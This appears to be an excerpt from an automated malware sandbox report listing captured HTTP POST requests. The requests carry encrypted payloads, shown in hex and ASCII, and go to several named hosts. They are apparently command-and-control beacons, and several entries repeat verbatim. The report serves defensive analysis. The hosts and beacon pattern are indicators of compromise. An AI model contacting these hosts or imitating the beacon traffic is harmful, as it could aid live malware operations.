                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 74 54 41 4d 6e 66 39 62 7a 4a 5a 70 39 31 2f 70 33 6a 6c 65 54 59 69 4b 45 45 35 56 45 41 30 66 6f 79 4e 44 37 6f 37 79 41 4e 68 55 62 59 5a 44 2b 7a 45 72 48 34 45 46 72 49 34 5a 48 46 5a 63 32 4b 4a 31 57 4f 4c 71 69 62 77 66 2b 30 64 49 4e 69 4a 62 74 78 66 4f 51 6f 2b 77 46 70 33 34 4e 6b 53 34 56 6f 2b 37 47 4e 72 56 72 47 41 76 55 30 61 4b 51 35 4d 6a 31 73 74 2f 6e 6e 6e 66 4c 2f 70 78 62 56 52 62 35 78 59 32 46 56 55 74 72 39 39 6f 54 79 49 73 78 34 38 6c 55 6e 49 44 37 33 33 4a 45 2f 61 57 65 47 70 37 76 72 36 67 6a 46 4d 65 4f 72 64 70 36 6b 76 55 2f 70 64 68 69 66 2f 2f 41 56 48 48 35 61 4c 79 76 72 67 30 75 4a 52 4a 47 69 6c 41 38 59 72 39 44 45 33 49 71 53 4e 6d 47 7a 63 33 41 78 55 41 61 4f 77 47 4c 41 5a 74 53 31 77 53 52 49 6f 32 52 50 66 31 45 45 51 52 6d 34 38 4b 65 66 73 47 4b 2f 56 53 70 58 55 56 6d 46 6c 4d 44 6b 47 4c 2b 51 77 4d 59 43 6f 6e 53 76 79 47 72 36 34 2b 50 4d 4b 6a 57 54 77 4e 66 6d 42 61 4b 6f 7a 48 75 6f 30 64 76 73 67 77 79 34 78 50 48 59 58 58 32 76 4e 6d 77 35 2b 31 33 57 61 51 58 34 78 46 78 34 45 4d 2f 46 62 55 69 75 43 6b 57 2b 41 33 41 36 37 58 79 32 64 73 31 73 45 6a 39 59 66 4c 52 71 4b 6d 43 71 6b 48 48 49 6f 7a 75 50 59 62 67 58 47 46 38 4c 4c 45 41 5a 64 45 2b 6e 54 2b 2f 2f 69 4a 36 48 69 4c 45 6a 6c 77 76 4a 41 6c 50 47 50 37 30 64 6c 31 55 56 33 68 54 74 73 72 77 5a 2f 6f 66 61 54 39 57 6e 35 35 4f 6b 2b 74 73 67 47 38 75 45 72 6f 4e 75 70 50 69 76 55 6c 35 7a 79 67 63 66 6d 73 79 71 5a 4d 79 65 75 6c 46 66 72 4b 64 62 32 42 68 6a 41 52 43 42 4e 36 7a 51 63 6d 35 42 36 6f 58 73 65 74 59 72 6d 42 67 2b 43 33 61 44 55 50 76 73 76 71 51 37 73 3d Data Ascii: tTAMnf9bzJZp91/p3jleTYiKEE5VEA0foyND7o7yANhUbYZD+zErH4EFrI4ZHFZc2KJ1WOLqibwf+0dINiJbtxfOQo+wFp34NkS4Vo+7GNrVrGAvU0aKQ5Mj1st/nnnfL/pxbVRb5xY2FVUtr99oTyIsx48lUnID733JE/aWeGp7vr6gjFMeOrdp6kvU/pdhif//AVHH5aLyvrg0uJRJGilA8Yr9DE3IqSNmGzc3AxUAaOwGLAZtS1wSRIo2RPf1EEQRm48KefsGK/VSpXUVmFlMDkGL+QwMYConSvyGr64+PMKjWTwNfmBaKozHuo0dvsgwy4xPHYXX2vNmw5+13WaQX4xFx4EM/FbUiuCkW+A3A67Xy2ds1sEj9YfLRqKmCqkHHIozuPYbgXGF8LLEAZdE+nT+//iJ6HiLEjlwvJAlPGP70dl1UV3hTtsrwZ/ofaT9Wn55Ok+tsgG8uEroNupPivUl5zygcfmsyqZMyeulFfrKdb2BhjARCBN6zQcm5B6oXsetYrmBg+C3aDUPvsvqQ7s=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 32 39 55 32 4b 4f 33 67 30 4a 5a 6b 52 70 65 48 35 4d 33 4e 46 61 62 54 34 57 62 62 53 72 37 6f 63 54 42 44 4e 38 77 4b 31 79 45 48 61 65 32 66 78 72 42 55 72 77 7a 33 49 47 61 58 43 57 50 39 67 6b 7a 66 37 53 6f 37 6b 4f 2f 4b 51 59 47 31 69 6c 53 4b 64 74 2b 71 50 6b 52 4c 4d 78 30 44 69 7a 4e 71 61 37 6b 36 53 4b 43 79 42 4c 30 57 78 66 39 4a 33 36 37 46 53 73 54 37 76 58 65 44 5a 30 48 65 77 52 69 46 34 31 43 35 42 59 67 45 4e 65 30 4e 75 76 52 2b 50 76 62 33 69 4b 6f 68 53 66 44 33 49 41 32 31 44 47 58 65 32 33 72 38 71 67 6c 49 32 46 64 33 30 78 53 4b 7a 52 6e 54 79 42 2f 39 4d 33 75 36 6e 79 79 71 47 4c 70 2b 4b 68 30 6d 44 32 39 72 45 75 55 79 49 7a 4e 32 4f 67 4a 61 57 61 6f 67 75 62 69 42 62 57 49 2f 71 55 78 31 74 6f 39 47 44 2b 76 49 72 78 72 2f 4f 35 6a 5a 6d 69 73 2f 31 47 34 36 33 68 72 45 47 67 35 5a 6d 47 6f 34 5a 67 56 49 4f 31 4d 45 50 67 37 65 4c 4b 4a 38 77 64 62 69 6c 73 55 48 4e 4b 50 69 79 47 30 6f 4b 4e 4f 6b 47 52 39 6e 4f 47 55 47 70 6b 6e 6a 32 6f 30 67 6b 64 47 51 65 72 73 68 65 31 62 53 56 61 79 51 53 2f 4a 48 38 6b 54 4f 58 34 6c 50 6d 44 7a 78 57 45 56 46 51 31 68 62 58 69 6b 51 37 44 4f 68 6a 53 2b 57 33 71 31 69 56 36 53 4f 30 30 57 4c 59 47 4c 59 39 75 44 73 2f 62 4b 61 55 50 65 78 74 4d 44 66 75 4b 64 47 44 58 68 41 5a 2f 31 49 2f 53 6e 66 64 78 66 38 67 32 35 34 65 31 49 65 5a 5a 39 6f 4f 41 55 4a 72 79 6f 77 64 32 78 6e 79 67 62 70 53 52 35 4a 5a 54 35 4b 4d 6b 42 32 32 4a 59 6b 49 30 52 66 76 6b 69 32 6f 51 6b 53 66 38 59 67 34 31 50 65 45 67 39 61 36 56 48 55 4a 73 55 41 50 39 67 31 35 2f 4d 4c 34 4e 4f 4e 44 31 77 33 6a 53 34 3d Data Ascii: 29U2KO3g0JZkRpeH5M3NFabT4WbbSr7ocTBDN8wK1yEHae2fxrBUrwz3IGaXCWP9gkzf7So7kO/KQYG1ilSKdt+qPkRLMx0DizNqa7k6SKCyBL0Wxf9J367FSsT7vXeDZ0HewRiF41C5BYgENe0NuvR+Pvb3iKohSfD3IA21DGXe23r8qglI2Fd30xSKzRnTyB/9M3u6nyyqGLp+Kh0mD29rEuUyIzN2OgJaWaogubiBbWI/qUx1to9GD+vIrxr/O5jZmis/1G463hrEGg5ZmGo4ZgVIO1MEPg7eLKJ8wdbilsUHNKPiyG0oKNOkGR9nOGUGpknj2o0gkdGQershe1bSVayQS/JH8kTOX4lPmDzxWEVFQ1hbXikQ7DOhjS+W3q1iV6SO00WLYGLY9uDs/bKaUPextMDfuKdGDXhAZ/1I/Snfdxf8g254e1IeZZ9oOAUJryowd2xnygbpSR5JZT5KMkB22JYkI0Rfvki2oQkSf8Yg41PeEg9a6VHUJsUAP9g15/ML4NOND1w3jS4=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 6c 57 74 49 6a 4b 50 51 79 35 62 72 6d 58 61 78 4b 6e 33 55 65 63 78 36 66 31 76 4a 71 77 35 34 68 7a 43 34 56 56 51 53 6a 39 33 65 32 49 74 36 63 32 54 6f 4f 6e 6e 56 35 51 78 4a 30 50 47 4e 71 72 48 32 4f 31 4b 6f 58 4d 32 51 51 61 74 52 57 58 6d 49 2b 54 46 6e 65 71 72 78 78 46 2f 4d 32 66 62 49 67 39 41 30 32 46 63 2f 68 71 43 68 6f 34 51 2b 43 57 65 46 65 4f 53 78 78 49 65 4d 6c 79 43 59 77 34 67 76 4f 2f 55 44 54 45 4e 6f 57 74 4f 4c 6f 58 75 5a 2b 32 37 66 36 52 5a 38 4d 72 78 70 67 67 44 35 5a 39 45 7a 53 61 6c 4a 31 77 57 71 6f 5a 4a 55 57 51 6c 31 38 42 76 52 36 70 48 36 59 73 64 37 51 4c 63 6b 55 38 58 7a 2b 35 57 71 68 78 74 44 65 78 71 70 41 66 33 67 35 38 4e 31 6d 49 52 74 7a 48 48 77 58 2b 2b 58 73 35 2f 6c 72 59 54 44 78 4d 64 54 72 59 47 41 4d 58 6e 69 4d 43 69 45 4e 31 2b 32 67 72 6d 71 5a 31 6b 4f 39 38 4f 58 74 31 34 4a 68 58 75 71 56 6e 69 2f 75 38 41 2f 43 46 43 34 6d 41 67 38 73 36 70 38 78 4c 45 63 64 76 4a 36 4c 67 73 32 4d 6e 2b 5a 62 2b 58 70 37 67 62 68 35 35 4e 43 75 76 35 57 31 35 56 74 6c 74 78 62 54 59 4c 61 51 38 4a 6f 46 4f 78 6b 4a 34 34 4f 39 64 79 51 59 37 4e 41 52 79 39 6d 32 73 4c 58 45 69 75 30 6e 6d 51 6a 68 66 77 69 41 66 2b 52 2b 59 41 63 76 70 62 64 67 75 64 4c 7a 4c 71 6c 70 7a 51 55 73 51 38 50 72 4f 42 44 52 61 4e 57 32 54 4c 74 4d 6a 71 44 7a 46 69 59 33 4f 4b 74 43 36 76 39 6f 46 41 34 42 61 59 79 43 44 49 4f 79 44 43 57 38 51 66 74 2b 4c 43 38 4e 6f 64 30 6f 4e 32 43 4a 66 50 67 6d 71 49 42 59 75 43 41 45 4c 38 42 63 6d 49 6b 59 38 49 61 6a 2f 4e 59 47 31 52 4d 4d 6c 66 35 44 54 32 44 30 48 31 33 42 65 5a 30 68 57 38 66 6f 4f 76 6f 6e 41 72 2b 55 42 62 47 57 6e 41 41 34 69 32 4e 46 53 4a 68 74 7a 6e 77 49 50 49 52 67 73 7a 76 68 6e 77 74 32 72 6f 66 50 6e 47 32 74 71 43 54 Data Ascii: lWtIjKPQy5brmXaxKn3Uecx6f1vJqw54hzC4VVQSj93e2It6c2ToOnnV5QxJ0PGNqrH2O1KoXM2QQatRWXmI+TFneqrxxF/M2fbIg9A02Fc/hqCho4Q+CWeFeOSxxIeMlyCYw4gvO/UDTENoWtOLoXuZ+27f6RZ8MrxpggD5Z9EzSalJ1wWqoZJUWQl18BvR6pH6Ysd7QLckU8Xz+5WqhxtDexqpAf3g58N1mIRtzHHwX++Xs5/lrYTDxMdTrYGAMXniMCiEN1+2grmqZ1kO98OXt14JhXuqVni/u8A/CFC4mAg8s6p8xLEcdvJ6Lgs2Mn+Zb+Xp7gbh55NCuv5W15VtltxbTYLaQ8JoFOxkJ44O9dyQY7NARy9m2sLXEiu0nmQjhfwiAf+R+YAcvpbdgudLzLqlpzQUsQ8PrOBDRaNW2TLtMjqDzFiY3OKtC6v9oFA4BaYyCDIOyDCW8Qft+LC8Nod0oN2CJfPgmqIBYuCAEL8BcmIkY8Iaj/NYG1RMMlf5DT2D0H13BeZ0hW8foOvonAr+UBbGWnAA4i2NFSJhtznwIPIRgszvhnwt2rofPnG2tqCT
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 32 39 55 32 4b 4f 33 67 30 4a 5a 6b 52 70 65 48 35 4d 33 4e 46 61 62 54 34 57 62 62 53 72 37 6f 63 54 42 44 4e 38 77 4b 31 79 45 48 61 65 32 66 78 72 42 55 72 77 7a 33 49 47 61 58 43 57 50 39 67 6b 7a 66 37 53 6f 37 6b 4f 2f 4b 51 59 47 31 69 6c 53 4b 64 74 2b 71 50 6b 52 4c 4d 78 30 44 69 7a 4e 71 61 37 6b 36 53 4b 43 79 42 4c 30 57 78 66 39 4a 33 36 37 46 53 73 54 37 76 58 65 44 5a 30 48 65 77 52 69 46 34 31 43 35 42 59 67 45 4e 65 30 4e 75 76 52 2b 50 76 62 33 69 4b 6f 68 53 66 44 33 49 41 32 31 44 47 58 65 32 33 72 38 71 67 6c 49 32 46 64 33 30 78 53 4b 7a 52 6e 54 79 42 2f 39 4d 33 75 36 6e 79 79 71 47 4c 70 2b 4b 68 30 6d 44 32 39 72 45 75 55 79 49 7a 4e 32 4f 67 4a 61 57 61 6f 67 75 62 69 42 62 57 49 2f 71 55 78 31 74 6f 39 47 44 2b 76 49 72 78 72 2f 4f 35 6a 5a 6d 69 73 2f 31 47 34 36 33 68 72 45 47 67 35 5a 6d 47 6f 34 5a 67 56 49 4f 31 4d 45 50 67 37 65 4c 4b 4a 38 77 64 62 69 6c 73 55 48 4e 4b 50 69 79 47 30 6f 4b 4e 4f 6b 47 52 39 6e 4f 47 55 47 70 6b 6e 6a 32 6f 30 67 6b 64 47 51 65 72 73 68 65 31 62 53 56 61 79 51 53 2f 4a 48 38 6b 54 4f 58 34 6c 50 6d 44 7a 78 57 45 56 46 51 31 68 62 58 69 6b 51 37 44 4f 68 6a 53 2b 57 33 71 31 69 56 36 53 4f 30 30 57 4c 59 47 4c 59 39 75 44 73 2f 62 4b 61 55 50 65 78 74 4d 44 66 75 4b 64 47 44 58 68 41 5a 2f 31 49 2f 53 6e 66 64 78 66 38 67 32 35 34 65 31 49 65 5a 5a 39 6f 4f 41 55 4a 72 79 6f 77 64 32 78 6e 79 67 62 70 53 52 35 4a 5a 54 35 4b 4d 6b 42 32 32 4a 59 6b 49 30 52 66 76 6b 69 32 6f 51 6b 53 66 38 59 67 34 31 50 65 45 67 39 61 36 56 48 55 4a 73 55 41 50 39 67 31 35 2f 4d 4c 34 4e 4f 4e 44 31 77 33 6a 53 34 3d Data Ascii: 29U2KO3g0JZkRpeH5M3NFabT4WbbSr7ocTBDN8wK1yEHae2fxrBUrwz3IGaXCWP9gkzf7So7kO/KQYG1ilSKdt+qPkRLMx0DizNqa7k6SKCyBL0Wxf9J367FSsT7vXeDZ0HewRiF41C5BYgENe0NuvR+Pvb3iKohSfD3IA21DGXe23r8qglI2Fd30xSKzRnTyB/9M3u6nyyqGLp+Kh0mD29rEuUyIzN2OgJaWaogubiBbWI/qUx1to9GD+vIrxr/O5jZmis/1G463hrEGg5ZmGo4ZgVIO1MEPg7eLKJ8wdbilsUHNKPiyG0oKNOkGR9nOGUGpknj2o0gkdGQershe1bSVayQS/JH8kTOX4lPmDzxWEVFQ1hbXikQ7DOhjS+W3q1iV6SO00WLYGLY9uDs/bKaUPextMDfuKdGDXhAZ/1I/Snfdxf8g254e1IeZZ9oOAUJryowd2xnygbpSR5JZT5KMkB22JYkI0Rfvki2oQkSf8Yg41PeEg9a6VHUJsUAP9g15/ML4NOND1w3jS4=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 6b 6a 32 6d 42 7a 4c 53 7a 35 5a 35 50 49 59 78 5a 59 75 65 4f 54 58 6d 2b 2f 34 43 4b 6a 72 56 68 74 76 38 75 41 32 78 4a 4c 56 6d 30 75 6f 35 4c 34 38 62 44 38 77 49 38 66 37 53 7a 79 4d 6b 6e 52 54 53 63 53 79 38 30 38 4b 66 64 38 68 52 54 54 45 37 37 71 37 51 35 59 63 55 76 4c 33 2b 6c 4b 41 44 35 43 43 49 36 79 6b 6f 41 76 58 2b 53 2b 38 30 69 39 79 42 35 73 35 66 45 66 4c 67 67 31 37 6a 39 4a 33 43 4b 6d 39 7a 74 39 61 6b 71 4a 32 6e 4a 41 51 4f 78 68 75 79 78 39 6a 57 6d 31 31 61 6d 43 38 38 72 69 57 68 4a 33 35 67 49 44 79 54 4f 36 65 6d 52 76 6f 4d 4e 59 30 4d 52 74 4d 39 4d 48 4f 74 55 34 47 36 53 30 44 48 36 79 4c 49 65 67 6b 42 68 58 36 75 76 52 77 52 35 4b 69 36 50 58 4b 34 39 65 77 5a 36 68 5a 49 4e 77 4f 6a 4c 39 43 55 33 6d 77 4e 59 45 75 47 4e 4c 73 6d 54 4b 6d 4f 59 48 76 4f 46 4c 47 67 6a 42 78 38 64 64 6b 68 4c 6d 53 5a 75 57 4a 4b 4a 64 72 73 32 66 43 69 62 46 75 65 74 69 74 4b 6d 46 54 71 35 65 2f 5a 6b 33 52 71 55 45 64 55 50 6a 49 44 77 57 42 44 54 4d 50 56 34 55 35 59 37 6c 42 30 64 69 4f 35 54 4b 38 31 52 63 4e 51 59 64 38 5a 67 54 30 6b 2f 75 41 42 50 71 52 78 68 32 6a 33 4e 76 72 6e 57 46 47 43 31 78 30 79 49 62 32 62 43 44 74 66 64 62 42 59 70 4f 59 37 46 4f 56 53 37 62 73 51 30 41 47 6f 36 54 6b 56 35 32 44 56 65 33 31 63 33 69 4d 67 4d 32 63 6b 2b 6b 4f 56 4a 6d 61 34 41 38 44 69 54 48 68 70 5a 63 36 61 62 7a 6d 36 6c 74 4e 6b 7a 48 4a 5a 4a 58 57 48 2b 59 6c 6c 66 56 53 58 4d 58 74 64 42 55 65 64 4d 4f 6f 57 48 41 6d 6f 57 2b 38 30 38 73 71 53 64 35 77 38 55 4c 73 51 65 64 61 41 71 4b 36 30 65 74 47 44 72 6e 49 4b 49 7a 55 42 71 6a 2b 79 58 41 70 74 36 5a 72 4e 4e 72 58 47 68 56 78 4f 52 58 53 6b 55 68 59 33 7a 77 55 3d Data Ascii: kj2mBzLSz5Z5PIYxZYueOTXm+/4CKjrVhtv8uA2xJLVm0uo5L48bD8wI8f7SzyMknRTScSy808Kfd8hRTTE77q7Q5YcUvL3+lKAD5CCI6ykoAvX+S+80i9yB5s5fEfLgg17j9J3CKm9zt9akqJ2nJAQOxhuyx9jWm11amC88riWhJ35gIDyTO6emRvoMNY0MRtM9MHOtU4G6S0DH6yLIegkBhX6uvRwR5Ki6PXK49ewZ6hZINwOjL9CU3mwNYEuGNLsmTKmOYHvOFLGgjBx8ddkhLmSZuWJKJdrs2fCibFuetitKmFTq5e/Zk3RqUEdUPjIDwWBDTMPV4U5Y7lB0diO5TK81RcNQYd8ZgT0k/uABPqRxh2j3NvrnWFGC1x0yIb2bCDtfdbBYpOY7FOVS7bsQ0AGo6TkV52DVe31c3iMgM2ck+kOVJma4A8DiTHhpZc6abzm6ltNkzHJZJXWH+YllfVSXMXtdBUedMOoWHAmoW+808sqSd5w8ULsQedaAqK60etGDrnIKIzUBqj+yXApt6ZrNNrXGhVxORXSkUhY3zwU=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 4f 58 61 62 41 6b 61 6f 7a 35 62 64 6d 4a 50 7a 59 57 4c 63 45 47 6c 6c 4c 35 43 6d 79 7a 4b 4c 32 6d 69 45 64 73 68 6d 71 58 4a 62 2f 37 32 6d 71 51 49 31 4f 32 31 65 4c 4f 32 58 63 74 45 63 58 6a 2f 49 70 79 50 4a 52 4f 4d 4e 31 38 41 73 31 4e 46 56 2b 7a 64 79 71 47 69 34 53 4c 46 53 44 42 63 78 6b 2b 49 53 48 31 6c 4b 7a 59 52 6f 77 69 68 4e 78 71 55 66 44 6c 62 45 35 32 6d 4c 5a 75 4c 57 41 63 72 43 4e 6a 61 32 53 30 6e 47 48 58 65 68 45 41 69 52 54 36 6f 35 47 32 7a 57 46 42 64 79 69 49 69 48 59 35 4f 4c 31 55 43 6a 55 66 6b 50 5a 75 52 2b 46 69 4f 6e 43 49 49 4c 4f 47 7a 6e 58 39 37 67 4a 30 79 64 43 55 61 45 4e 58 5a 51 65 51 61 63 35 76 4e 31 35 54 57 6b 57 35 48 71 6a 69 51 52 42 61 5a 50 55 67 4a 34 34 31 55 58 67 61 78 49 4c 4d 4f 51 59 39 54 32 51 31 34 75 55 57 36 31 31 31 6e 31 72 5a 56 53 4c 79 68 69 57 36 6b 75 43 47 51 2b 76 76 6e 6e 36 31 69 37 69 6c 69 57 31 42 6e 6b 55 44 59 69 41 65 78 79 34 32 62 42 54 55 58 33 4e 39 6b 67 4d 73 69 36 74 53 43 68 2b 64 31 79 48 33 46 4b 62 4f 52 63 71 72 33 2f 37 58 44 68 34 66 46 6c 75 76 6a 36 30 69 70 70 6a 31 64 58 66 58 5a 52 31 57 56 69 66 67 57 50 54 71 4b 42 66 45 65 4d 61 4a 59 65 33 50 2f 68 48 2f 42 78 55 4a 77 32 30 43 59 6b 55 79 4b 7a 47 50 74 30 75 2f 53 57 69 78 57 30 30 39 66 66 46 44 59 4d 6a 42 62 41 68 42 7a 32 50 65 4b 79 77 79 52 7a 4e 38 6e 55 36 44 73 69 44 31 52 55 46 64 79 35 72 79 49 67 77 59 49 39 52 53 75 49 47 4a 39 61 4d 42 34 37 5a 6b 6c 46 31 39 71 73 65 76 58 41 65 6e 7a 6a 56 52 79 6d 68 63 48 35 76 47 76 49 73 4f 37 36 49 39 53 52 78 2b 71 77 4a 45 59 55 63 34 76 35 4d 64 6a 36 30 5a 65 5a 4f 50 71 6f 67 6e 76 4c 49 68 62 78 4e 36 6d 5a 6d 71 4c 6c 4f 55 2f 4a 52 74 41 73 32 34 39 71 42 41 3d 3d Data Ascii: OXabAkaoz5bdmJPzYWLcEGllL5CmyzKL2miEdshmqXJb/72mqQI1O21eLO2XctEcXj/IpyPJROMN18As1NFV+zdyqGi4SLFSDBcxk+ISH1lKzYRowihNxqUfDlbE52mLZuLWAcrCNja2S0nGHXehEAiRT6o5G2zWFBdyiIiHY5OL1UCjUfkPZuR+FiOnCIILOGznX97gJ0ydCUaENXZQeQac5vN15TWkW5HqjiQRBaZPUgJ441UXgaxILMOQY9T2Q14uUW6111n1rZVSLyhiW6kuCGQ+vvnn61i7iliW1BnkUDYiAexy42bBTUX3N9kgMsi6tSCh+d1yH3FKbORcqr3/7XDh4fFluvj60ippj1dXfXZR1WVifgWPTqKBfEeMaJYe3P/hH/BxUJw20CYkUyKzGPt0u/SWixW009ffFDYMjBbAhBz2PeKywyRzN8nU6DsiD1RUFdy5ryIgwYI9RSuIGJ9aMB47ZklF19qsevXAenzjVRymhcH5vGvIsO76I9SRx+qwJEYUc4v5Mdj60ZeZOPqognvLIhbxN6mZmqLlOU/JRtAs249qBA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 6c 57 74 49 6a 4b 50 51 79 35 62 72 6d 58 61 78 4b 6e 33 55 65 63 78 36 66 31 76 4a 71 77 35 34 68 7a 43 34 56 56 51 53 6a 39 33 65 32 49 74 36 63 32 54 6f 4f 6e 6e 56 35 51 78 4a 30 50 47 4e 71 72 48 32 4f 31 4b 6f 58 4d 32 51 51 61 74 52 57 58 6d 49 2b 54 46 6e 65 71 72 78 78 46 2f 4d 32 66 62 49 67 39 41 30 32 46 63 2f 68 71 43 68 6f 34 51 2b 43 57 65 46 65 4f 53 78 78 49 65 4d 6c 79 43 59 77 34 67 76 4f 2f 55 44 54 45 4e 6f 57 74 4f 4c 6f 58 75 5a 2b 32 37 66 36 52 5a 38 4d 72 78 70 67 67 44 35 5a 39 45 7a 53 61 6c 4a 31 77 57 71 6f 5a 4a 55 57 51 6c 31 38 42 76 52 36 70 48 36 59 73 64 37 51 4c 63 6b 55 38 58 7a 2b 35 57 71 68 78 74 44 65 78 71 70 41 66 33 67 35 38 4e 31 6d 49 52 74 7a 48 48 77 58 2b 2b 58 73 35 2f 6c 72 59 54 44 78 4d 64 54 72 59 47 41 4d 58 6e 69 4d 43 69 45 4e 31 2b 32 67 72 6d 71 5a 31 6b 4f 39 38 4f 58 74 31 34 4a 68 58 75 71 56 6e 69 2f 75 38 41 2f 43 46 43 34 6d 41 67 38 73 36 70 38 78 4c 45 63 64 76 4a 36 4c 67 73 32 4d 6e 2b 5a 62 2b 58 70 37 67 62 68 35 35 4e 43 75 76 35 57 31 35 56 74 6c 74 78 62 54 59 4c 61 51 38 4a 6f 46 4f 78 6b 4a 34 34 4f 39 64 79 51 59 37 4e 41 52 79 39 6d 32 73 4c 58 45 69 75 30 6e 6d 51 6a 68 66 77 69 41 66 2b 52 2b 59 41 63 76 70 62 64 67 75 64 4c 7a 4c 71 6c 70 7a 51 55 73 51 38 50 72 4f 42 44 52 61 4e 57 32 54 4c 74 4d 6a 71 44 7a 46 69 59 33 4f 4b 74 43 36 76 39 6f 46 41 34 42 61 59 79 43 44 49 4f 79 44 43 57 38 51 66 74 2b 4c 43 38 4e 6f 64 30 6f 4e 32 43 4a 66 50 67 6d 71 49 42 59 75 43 41 45 4c 38 42 63 6d 49 6b 59 38 49 61 6a 2f 4e 59 47 31 52 4d 4d 6c 66 35 44 54 32 44 30 48 31 33 42 65 5a 30 68 57 38 66 6f 4f 76 6f 6e 41 72 2b 55 42 62 47 57 6e 41 41 34 69 32 4e 46 53 4a 68 74 7a 6e 77 49 50 49 52 67 73 7a 76 68 6e 77 74 32 72 6f 66 50 6e 47 32 74 71 43 54 Data Ascii: lWtIjKPQy5brmXaxKn3Uecx6f1vJqw54hzC4VVQSj93e2It6c2ToOnnV5QxJ0PGNqrH2O1KoXM2QQatRWXmI+TFneqrxxF/M2fbIg9A02Fc/hqCho4Q+CWeFeOSxxIeMlyCYw4gvO/UDTENoWtOLoXuZ+27f6RZ8MrxpggD5Z9EzSalJ1wWqoZJUWQl18BvR6pH6Ysd7QLckU8Xz+5WqhxtDexqpAf3g58N1mIRtzHHwX++Xs5/lrYTDxMdTrYGAMXniMCiEN1+2grmqZ1kO98OXt14JhXuqVni/u8A/CFC4mAg8s6p8xLEcdvJ6Lgs2Mn+Zb+Xp7gbh55NCuv5W15VtltxbTYLaQ8JoFOxkJ44O9dyQY7NARy9m2sLXEiu0nmQjhfwiAf+R+YAcvpbdgudLzLqlpzQUsQ8PrOBDRaNW2TLtMjqDzFiY3OKtC6v9oFA4BaYyCDIOyDCW8Qft+LC8Nod0oN2CJfPgmqIBYuCAEL8BcmIkY8Iaj/NYG1RMMlf5DT2D0H13BeZ0hW8foOvonAr+UBbGWnAA4i2NFSJhtznwIPIRgszvhnwt2rofPnG2tqCT
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 6b 6a 32 6d 42 7a 4c 53 7a 35 5a 35 50 49 59 78 5a 59 75 65 4f 54 58 6d 2b 2f 34 43 4b 6a 72 56 68 74 76 38 75 41 32 78 4a 4c 56 6d 30 75 6f 35 4c 34 38 62 44 38 77 49 38 66 37 53 7a 79 4d 6b 6e 52 54 53 63 53 79 38 30 38 4b 66 64 38 68 52 54 54 45 37 37 71 37 51 35 59 63 55 76 4c 33 2b 6c 4b 41 44 35 43 43 49 36 79 6b 6f 41 76 58 2b 53 2b 38 30 69 39 79 42 35 73 35 66 45 66 4c 67 67 31 37 6a 39 4a 33 43 4b 6d 39 7a 74 39 61 6b 71 4a 32 6e 4a 41 51 4f 78 68 75 79 78 39 6a 57 6d 31 31 61 6d 43 38 38 72 69 57 68 4a 33 35 67 49 44 79 54 4f 36 65 6d 52 76 6f 4d 4e 59 30 4d 52 74 4d 39 4d 48 4f 74 55 34 47 36 53 30 44 48 36 79 4c 49 65 67 6b 42 68 58 36 75 76 52 77 52 35 4b 69 36 50 58 4b 34 39 65 77 5a 36 68 5a 49 4e 77 4f 6a 4c 39 43 55 33 6d 77 4e 59 45 75 47 4e 4c 73 6d 54 4b 6d 4f 59 48 76 4f 46 4c 47 67 6a 42 78 38 64 64 6b 68 4c 6d 53 5a 75 57 4a 4b 4a 64 72 73 32 66 43 69 62 46 75 65 74 69 74 4b 6d 46 54 71 35 65 2f 5a 6b 33 52 71 55 45 64 55 50 6a 49 44 77 57 42 44 54 4d 50 56 34 55 35 59 37 6c 42 30 64 69 4f 35 54 4b 38 31 52 63 4e 51 59 64 38 5a 67 54 30 6b 2f 75 41 42 50 71 52 78 68 32 6a 33 4e 76 72 6e 57 46 47 43 31 78 30 79 49 62 32 62 43 44 74 66 64 62 42 59 70 4f 59 37 46 4f 56 53 37 62 73 51 30 41 47 6f 36 54 6b 56 35 32 44 56 65 33 31 63 33 69 4d 67 4d 32 63 6b 2b 6b 4f 56 4a 6d 61 34 41 38 44 69 54 48 68 70 5a 63 36 61 62 7a 6d 36 6c 74 4e 6b 7a 48 4a 5a 4a 58 57 48 2b 59 6c 6c 66 56 53 58 4d 58 74 64 42 55 65 64 4d 4f 6f 57 48 41 6d 6f 57 2b 38 30 38 73 71 53 64 35 77 38 55 4c 73 51 65 64 61 41 71 4b 36 30 65 74 47 44 72 6e 49 4b 49 7a 55 42 71 6a 2b 79 58 41 70 74 36 5a 72 4e 4e 72 58 47 68 56 78 4f 52 58 53 6b 55 68 59 33 7a 77 55 3d Data Ascii: 